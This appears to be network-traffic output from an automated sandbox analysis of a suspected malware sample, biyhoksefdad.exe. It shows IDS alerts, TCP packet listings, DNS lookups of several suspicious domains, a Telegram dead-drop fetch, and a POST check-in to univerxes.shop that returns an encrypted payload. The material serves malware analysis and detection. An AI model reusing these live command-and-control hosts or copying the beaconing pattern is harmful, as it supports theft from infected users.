2025-03-11T17:29:22.334502+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49713 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:27.454739+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49715 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:31.085947+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49716 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:35.252998+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49718 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:37.690865+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49720 | 104.73.234.102 | 443 | TCP
2025-03-11T17:29:41.054063+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49722 | 104.73.234.102 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                        Mar 11, 2025 17:29:16.328324080 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:16.328419924 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:16.328713894 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:16.328725100 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.162934065 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.163033009 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.188143969 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.188169956 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.188538074 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.212240934 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.212444067 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.212470055 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.212527037 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.260330915 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:19.068775892 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:19.082386017 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462414980 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462472916 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462562084 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462949991 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462963104 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.334053040 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.334501982 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.335747957 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.335764885 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.336009979 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.337337017 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.339391947 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.339421988 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.340095043 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.340106010 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.373692989 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.373804092 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.373857021 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.388976097 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.389002085 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507030010 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507110119 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507224083 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507540941 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507558107 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.454629898 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.454739094 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.456687927 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.456708908 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.457027912 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.458709002 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.458844900 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.458882093 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:28.513372898 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:28.513686895 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143208027 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143254995 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143322945 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143794060 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143810034 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.085861921 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.085947037 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.087563038 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.087584019 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.087841034 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.089818001 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090670109 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090703011 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090791941 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090817928 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090938091 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090956926 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091167927 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091202974 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091417074 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091447115 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091680050 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091706038 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091720104 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091732025 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091854095 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091871977 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091892958 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091932058 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092012882 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092053890 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092071056 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092082024 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092108965 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092215061 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092235088 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092256069 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092268944 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092437029 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:33.950629950 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:33.950871944 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031346083 CET49718443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031388998 CET44349718172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031775951 CET49718443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031775951 CET49718443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031800032 CET44349718172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.252998114 CET49718443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.566823006 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.566875935 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.567117929 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.567641973 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.567653894 CET44349720104.73.234.102192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 11, 2025 17:29:03.390073061 CET | 192.168.2.5 | 1.1.1.1 | 0x9e5d | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:06.475009918 CET | 192.168.2.5 | 1.1.1.1 | 0x1ed5 | Standard query (0) | univerxes.shop | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.255791903 CET | 192.168.2.5 | 1.1.1.1 | 0x81b2 | Standard query (0) | begindecafer.world | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.265959978 CET | 192.168.2.5 | 1.1.1.1 | 0x16b3 | Standard query (0) | garagedrootz.top | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.463797092 CET | 192.168.2.5 | 1.1.1.1 | 0x5bfd | Standard query (0) | modelshiverd.icu | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.481031895 CET | 192.168.2.5 | 1.1.1.1 | 0x213 | Standard query (0) | arisechairedd.shop | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.493740082 CET | 192.168.2.5 | 1.1.1.1 | 0xbe6b | Standard query (0) | catterjur.run | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.515969992 CET | 192.168.2.5 | 1.1.1.1 | 0xd650 | Standard query (0) | orangemyther.live | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.527062893 CET | 192.168.2.5 | 1.1.1.1 | 0x6a99 | Standard query (0) | fostinjec.today | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.540394068 CET | 192.168.2.5 | 1.1.1.1 | 0x9bb1 | Standard query (0) | sterpickced.digital | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.557868958 CET | 192.168.2.5 | 1.1.1.1 | 0x6602 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 11, 2025 17:29:03.396910906 CET | 1.1.1.1 | 192.168.2.5 | 0x9e5d | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:06.487390995 CET | 1.1.1.1 | 192.168.2.5 | 0x1ed5 | No error (0) | univerxes.shop | | 172.67.213.171 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:06.487390995 CET | 1.1.1.1 | 192.168.2.5 | 0x1ed5 | No error (0) | univerxes.shop | | 104.21.16.155 | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.264422894 CET | 1.1.1.1 | 192.168.2.5 | 0x81b2 | Name error (3) | begindecafer.world | none | none | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.462259054 CET | 1.1.1.1 | 192.168.2.5 | 0x16b3 | Name error (3) | garagedrootz.top | none | none | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.474710941 CET | 1.1.1.1 | 192.168.2.5 | 0x5bfd | Name error (3) | modelshiverd.icu | none | none | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.490310907 CET | 1.1.1.1 | 192.168.2.5 | 0x213 | Name error (3) | arisechairedd.shop | none | none | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.502366066 CET | 1.1.1.1 | 192.168.2.5 | 0xbe6b | Name error (3) | catterjur.run | none | none | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.524657011 CET | 1.1.1.1 | 192.168.2.5 | 0xd650 | Name error (3) | orangemyther.live | none | none | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.535969019 CET | 1.1.1.1 | 192.168.2.5 | 0x6a99 | Name error (3) | fostinjec.today | none | none | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.548990965 CET | 1.1.1.1 | 192.168.2.5 | 0x9bb1 | Name error (3) | sterpickced.digital | none | none | A (IP address) | IN (0x0001) | false
Mar 11, 2025 17:29:35.565241098 CET | 1.1.1.1 | 192.168.2.5 | 0x6602 | No error (0) | steamcommunity.com | | 104.73.234.102 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                        • t.me
                                                                                                                                                                                                        • univerxes.shop
                                                                                                                                                                                                        • steamcommunity.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49708 | 149.154.167.99 | 443 | 8332 | C:\Users\user\Desktop\biyhoksefdad.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:29:05 UTC | 64 | OUT | GET /kz_prokla2 HTTP/1.1
Connection: Keep-Alive
Host: t.me
2025-03-11 16:29:06 UTC | 512 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 11 Mar 2025 16:29:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12363
Connection: close
Set-Cookie: stel_ssid=ccd2df26ae62a59bd6_10192532277023105280; expires=Wed, 12 Mar 2025 16:29:06 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2025-03-11 16:29:06 UTC | 12363 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 7a 5f 70 72 6f 6b 6c 61 32 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @kz_prokla2</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49710 | 172.67.213.171 | 443 | 8332 | C:\Users\user\Desktop\biyhoksefdad.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-11 16:29:09 UTC | 264 bytes | OUT | POST /SwnNW HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 65
Host: univerxes.shop
2025-03-11 16:29:09 UTC | 65 bytes | OUT | Data Raw: 75 69 64 3d 66 32 37 34 65 33 39 64 38 65 39 61 33 61 61 63 39 64 36 30 38 33 38 31 62 30 39 37 30 30 31 64 61 33 39 61 38 39 66 38 36 39 64 36 64 35 32 65 63 66 37 32 32 65 32 32 26 63 69 64 3d
Data Ascii: uid=f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22&cid=
2025-03-11 16:29:10 UTC | 790 bytes | IN | HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 16:29:10 GMT
Content-Type: application/octet-stream
Content-Length: 14134
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QY51yGH%2FeWBq9nXp9h4vlh64UWRwl137OJn9n2S0EbLIGkIASlIPclsLV0eMR%2FdlpnX8zWMyPQp5NFd6VXx%2B%2FXIf6lenIyaMsnnSph0pA5%2F2XYqlewawMsG7pDUcmM5QA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91ec6dd868e06195-ORD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=52697&min_rtt=52667&rtt_var=14837&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=965&delivery_rate=54978&cwnd=32&unsent_bytes=0&cid=f73852f6a6d9261d&ts=1042&x=0"
2025-03-11 16:29:10 UTC | 579 bytes | IN | Data Raw: 29 b8 1d ea 62 07 7f 2e 18 c6 f7 6f 26 de ac 0c 28 76 b6 76 ea 45 61 b5 9a 45 ab fc a2 b0 dd 08 e4 63 b6 4e b7 8c 8c 6a 16 12 25 34 d5 d8 54 e5 79 e5 f0 83 11 4b 43 e5 a5 1a 8c 5b 0a 9f 11 fa f4 fc a1 96 67 33 21 28 2f 2d 62 dc f2 d3 2b b4 41 6c 99 e9 3b 75 ad 4c 3a 8c cd 34 42 6a aa 7e 7a 93 1f 83 58 6c 34 ee 21 af 8f 77 cd 0f 9d 1e 1d bb 5b 3a 13 06 ac f0 57 5f bd ac 66 10 9e b0 6a 15 2f 4a 9d 43 e3 2b ef 4d c2 e7 f4 f0 68 fa 42 56 d1 97 ce ba f2 f4 a4 e5 00 9e e6 29 7f d2 f0 34 ab f1 5e 13 bd 0d 51 4c 27 3c c6 ef 5a 35 33 c1 4f 3e 15 c5 20 4a 63 a8 f6 b9 bb 26 19 e5 54 53 c4 4a e1 1a 1d c0 c4 91 61 20 16 7f e0 8d 9b f4 6a dd 41 7c f0 6e 60 12 51 dd 0c 69 54 72 26 33 ed a7 4e a0 0b bb 27 c0 01 bb 83 25 1d db a5 d2 d2 84 73 f6 3b bf 61 df bf 9d 00 58 4a
Data Ascii: )b.o&(vvEaEcNj%4TyKC[g3!(/-b+Al;uL:4Bj~zXl4!w[:W_fj/JC+MhBV)4^QL'<Z53O> Jc&TSJa jA|n`QiTr&3N'%s;aXJ
2025-03-11 16:29:10 UTC | 1369 bytes | IN | Data Raw: 4f 6f e2 cd 1a 4e d8 a7 03 29 1c ac 80 4f 65 97 9b d6 42 ba f7 6a 13 ca 6f 02 43 93 99 cf b4 d6 ea 50 2c 16 39 0d 36 25 d0 14 ff fa 2e db af a7 ac 99 22 8e 7b 4f 79 70 90 a5 7f 41 f2 8d 6d fd 73 0a d0 46 98 c8 a1 57 13 fa 4f a3 4e ec 56 4f 70 8a 13 8a 8a 6a ee a3 8c 5f f4 7f 1b f3 d8 a2 44 f5 26 e2 c3 3b 31 e2 10 1d 50 ed 49 bb be 11 54 95 79 3c 87 c2 d8 4c 30 ab 99 d9 14 ed 94 96 b0 fb 19 e4 59 5a db f1 80 d3 ac 6c 18 78 88 6e de 2a 4d 82 4a 11 0e fa 40 60 40 27 0b 3f fa 1c b2 a0 b2 7f e3 eb 0f b2 ca 34 89 93 2a cc cf 4a e8 36 31 42 24 0c eb 50 96 9a 1e 85 c7 dc 17 3b e1 86 75 5b fe a0 4c 71 52 ca d5 01 d9 99 2e e2 d7 db 4d 25 ea a6 05 42 c6 e9 55 b5 c1 44 c8 f8 2a 33 d8 0e 5e 10 2a f3 85 a0 ca 5c c2 33 5d 27 b7 80 11 5e e1 f8 94 4e 49 52 4a 64 d6 d2 aa
Data Ascii: OoN)OeBjoCP,96%."{OypAmsFWONVOpj_D&;1PITy<L0YZlxn*MJ@`@'?4*J61B$P;u[LqR.M%BUD*3^*\3]'^NIRJd
2025-03-11 16:29:10 UTC | 1369 bytes | IN | Data Raw: cf 19 72 0e 7b a7 75 48 db c1 2a e2 e0 03 ee 0d ca d2 8d 69 8c 49 3e 51 cd 8c 78 27 5a b8 3c 5b 17 f8 bc ea 93 0f be 39 8e 6b 72 97 1d 3a 4b 65 ed 19 b3 04 79 81 bc 86 32 93 f6 3b f3 ce 19 95 45 90 53 69 d4 f0 e2 17 71 82 e2 44 ef 05 3f 30 92 ca 39 67 d8 dc e5 d7 36 a4 ca dc 87 96 79 cc b1 d5 54 b2 c2 2b f5 b0 6e b5 46 67 b7 97 12 33 b7 e1 3b 50 36 da 21 69 55 f5 48 e7 85 b1 15 bd e2 a7 9a e8 03 3e 16 a7 09 47 c0 77 36 48 93 08 96 20 8a 88 8c 52 28 01 13 22 7b c7 d1 77 76 4c d7 e7 85 40 a9 ea 20 ed 96 28 ab 85 cf 3c 69 06 e9 75 b5 89 94 4a 0b 9f e8 4b 51 d9 d5 dd bb 41 28 ec dd 69 f8 b8 a2 ca 29 d1 23 e2 b3 95 2f e2 74 20 41 c6 8a 93 0e 6d fe de 6c 17 f7 27 51 82 e8 b3 90 b6 3f 93 f6 b3 fb b3 cb 7a 31 23 a7 9d af bc 49 3c 8d b5 f6 9a 5c 54 ea 15 7f 04 71
Data Ascii: r{uH*iI>Qx'Z<[9kr:Key2;ESiqD?09g6yT+nFg3;P6!iUH>Gw6H R("{wvL@ (<iuJKQA(i)#/t Aml'Q?z1#I<\Tq
2025-03-11 16:29:10 UTC | 1369 bytes | IN | Data Raw: 4d 3c 90 13 cf 85 f2 28 19 29 28 b9 cb c8 aa 8c 1f 21 8b 88 01 23 a7 aa ef bf 3b 80 2a 23 e9 6e 75 46 f2 32 25 35 52 be e3 bb fd 3e 8a ea 12 0d 0e 25 ae a3 7f 2c 4c 68 c6 c6 77 9b 49 b5 c8 0b e3 c0 94 8a e3 6e b5 6f 46 43 3d 1d 15 94 36 05 80 27 e2 9e 3e 49 98 bf 48 0d 50 99 f9 fa c2 01 a1 69 c8 a8 df 3f 63 af e1 6c a1 aa 4f 01 ef 57 44 dc 62 0e e5 af ff 6c ac cd 2e 8e 1b 18 25 09 33 91 e4 76 22 42 fc ec 03 f8 a6 dc 77 85 31 09 27 d3 39 4f 05 64 41 d0 b2 5e 1d dd 49 5c 28 24 c0 29 78 a0 2b 6f 8f 4c d8 b1 e2 1a 54 4f 41 93 52 ef b3 6e 9e 16 b2 8f d0 47 d3 24 f0 cd 6d 00 de e2 67 5a 26 c0 99 f0 5b 6b 72 68 5e 9a a8 fe b3 24 27 8b 02 68 1a 73 7c dc db 81 cb 7a 80 64 54 4e f2 8b d7 9e a4 26 f6 ef 62 c5 48 21 56 33 2d 92 de 1c 7b 22 81 ed f7 82 d5 ce 2d da 5a
Data Ascii: M<()(!#;*#nuF2%5R>%,LhwInoFC=6'>IHPi?clOWDbl.%3v"Bw1'9OdA^I\($)x+oLTOARnG$mgZ&[krh^$'hs|zdTN&bH!V3-{"-Z
2025-03-11 16:29:10 UTC | 1369 bytes | IN | Data Raw: 8a 11 14 da 2a cc 08 33 d8 61 38 a2 19 c8 24 62 80 95 28 4f c4 b0 0f f4 4e d0 5e 60 ff 12 7c 21 5b fb 4d 18 ac bf b9 14 7a 93 ca 82 a2 fa be 12 14 5d c0 f3 a6 7c a5 d1 66 c2 9c d8 83 a0 0d c9 13 24 e1 ec ef bf 98 1c 8d 92 cd 8a 5d 3b f2 a1 73 39 e3 fb 90 b8 8a ba 42 0a 1c 30 fc fa cd 48 bc 9b b6 7d 49 fe e8 63 9c 87 65 c1 24 4c a7 08 05 86 93 21 c2 1e eb a2 7e 46 b0 60 36 63 0b e8 fe 81 ff d8 7c 03 da b5 49 87 2c ba 40 45 82 98 30 cf dd 1d 8e f9 85 b7 1a 35 0a 47 50 a8 f4 d7 ac 74 e5 59 43 14 e6 ba c2 16 af 59 68 e5 1b 55 9d 0a 9b cb 85 7d fe c4 cb be 01 b0 59 7b e1 41 f0 29 31 78 61 78 ec ab 70 0f 41 24 e6 50 5c 7d 3c c7 08 e0 f9 e0 ac c9 c6 22 46 bf a4 c0 6e e4 62 46 aa 5c ff 76 d8 67 98 a5 80 2e ce a3 b2 4a fb 48 5f 75 c1 31 ce af 23 08 06 7f db ca ec
Data Ascii: *3a8$b(ON^`|![Mz]|f$];s9B0H}Ice$L!~F`6c|I,@E05GPtYCYhU}Y{A)1xaxpA$P\}<"FnbF\vg.JH_u1#
2025-03-11 16:29:10 UTC | 1369 bytes | IN | Data Raw: a7 91 e3 10 c3 74 25 b2 e7 06 a0 1f 7a 23 b6 5e 65 50 2b c0 0e 8c 06 c4 68 df 97 40 aa 24 1c 5a 31 2a a0 78 b7 2f ce 81 a4 e9 b3 83 c7 9d 1d 0f 8e 4d 30 d7 a9 62 74 f6 47 f5 19 9a c5 0c ce 5a bf 92 e7 7e 09 6e 38 db 55 cc 51 53 a0 71 b6 c9 75 33 ee d0 1c 8a f1 7f cd 50 54 24 28 8a 1d 3d be 33 36 ec b7 e5 e1 09 c3 ab 63 1c 89 5d a4 53 e2 89 93 9e 6e fa a4 ed d5 59 81 61 33 16 4b c9 b4 b5 4d a3 eb c6 dc 02 16 cd 9a 45 f9 e3 03 db c0 03 09 e4 b7 58 b5 fb 9c e1 f5 ca c9 4b b3 93 b4 9d 50 5d f4 8b 31 89 94 43 57 c3 33 9f b9 2f b4 79 f8 f9 c3 ed 8b 63 aa 36 6f 6d e6 e1 81 9e 1f 2f 89 3c 56 01 7e 8d 49 2f c9 20 e1 c9 15 bd 21 2f 96 78 8f b1 03 69 00 20 c4 54 fc fe 71 72 a1 66 77 e5 5f f3 3b a7 21 15 b6 cc a6 41 9d 3f ad f6 bc 32 ca 5f 66 25 86 9e 1f dd 7e 4d 38
